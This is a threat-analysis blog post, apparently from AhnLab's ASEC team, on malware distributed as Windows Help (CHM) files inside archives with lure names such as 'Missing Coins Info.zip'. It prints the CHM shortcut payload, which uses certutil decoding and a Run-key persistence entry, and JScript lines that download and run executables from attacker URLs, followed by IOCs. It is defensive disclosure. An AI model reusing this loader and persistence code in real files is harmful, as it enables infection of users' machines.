The ASEC analysis team has discovered a continuous distribution of malware disguised as a Windows Help File (*.chm). The most recent CHM file is identical to the file introduced in <APT Attack Being Distributed as Windows Help File (*.chm)> to download the additional malware.
It appears that the CHM file of this type is distributed in the form of a compressed file. The confirmed filenames of the compressed files and internal CHM files are as follows:
| Names of Compressed Files | Names of Internal CHM Files |
| Missing Coins Info.zip | lost.chm |
| Data.zip | Default.chm |
| Wage Statement.rar | salary.chm |
Missing Coins Info.zip file contains the following additional compressed file and Word file.
The Word file is an innocuous file that contains text related to missing coins (see Figure below).
Find Missing Coins.rar contains lost.chm, and when it is run, it creates Help with content related to coins and performs malicious activities.
Inside the lost.chm file is the same HTML file and the internal special command introduced in the previous blog post. As such, running the CHM file results in the execution of the cmd command and the creation of Document.dat and Document.jse in the %USERPROFILE%\Links\ folder. The difference from the previous is that Document.jse is created instead of Document.vbs.
<OBJECT id=shortcut classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=',cmd, /c echo I0B+XnZBQUFBQT09LW1EfmsnCStoLGIxT2s3K3ByKExuXkRgSnFqbU1rd0QganR/Vl5KYmlAI0AmN2wuUDF4SjE6W35KbVAyR1MrLi80bl5WfmJoTVBPS0VEV1B1WWh3dS13XmtEL2sgK1grUDRPT3drKUp6V1dhcn80bk5jXldzeltDRGw0Q2R/els0YzI0d19EWGErJzhQTH4vRGwuWSxdT2hhXS0nXi9NLy9jbmErcmlAI0AmZFIuOwlgXn5aUzBtVmRuKmkyRDRBQUE9PV4jfkAA > "%USERPROFILE%\Links\Document.dat" & start /MIN certutil -decode "%USERPROFILE%\Links\Document.dat" "%USERPROFILE%\Links\Document.jse" & start /MIN REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Document /t REG_SZ /d "%USERPROFILE%\Links\Document.jse" /f'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
shortcut.Click();
</SCRIPT>The data that exists in Document.dat is base64-decoded and saved as Document.jse. The decoded JSE data then uses powershell to download the additional file from a certain URL and runs it (see below).
var s=new ActiveXObject("WScript.Shell");
var c="cmd /c powershell iwr -outf %tmp%\\csrss.exe hxxps://foxiebed[.]com/database/db.php?type=1 & start %tmp%\\csrss.exe";
s.run(c,0,false);Afterward, it adds %USERPROFILE%\Links\Document.jse to HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to ensure that the JSE file can be continuously run.
The following CHM files were found subsequently.
- Wage Statement.rar – salary.chm
| (new ActiveXObject(“WScript.Shell”)).run(“cmd /c powershell iwr -outf %tmp%\\sihost.exe hxxps://cerebrovascular[.]net/resource/post & start %tmp%\\sihost.exe mLzio512pQo”,0,false) |
This file is compressed with an innocuous PDF file, in a similar fashion to the aforementioned Missing Coins Info.zip.
| (new ActiveXObject(“WScript.Shell”)).run(“cmd /c powershell iwr -outf %tmp%\\lsass.exe hxxps://trueliebe[.]com/kettle/pot & start %tmp%\\lsass.exe Dmzei125oAl”,0,false) |
The team could not find extra files because the access to the download URL is currently blocked, but users must stay vigilant as the attack may upload various malicious files in the future.
AhnLab’s anti-malware product, V3, detects and blocks the malware using the alias below.
[File Detection]
Trojan/CHM.Agent
[IOC]
aac428717f4b5ea1bfac9ae0998e661c
7467a360837a85ace6e14acc879e00e5
13446d8496858c2eac78e5e985af605b
hxxps://foxiebed[.]com/database/db.php?type=1
hxxps://cerebrovascular[.]net/resource/post
hxxps://trueliebe[.]com/kettle/pot
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.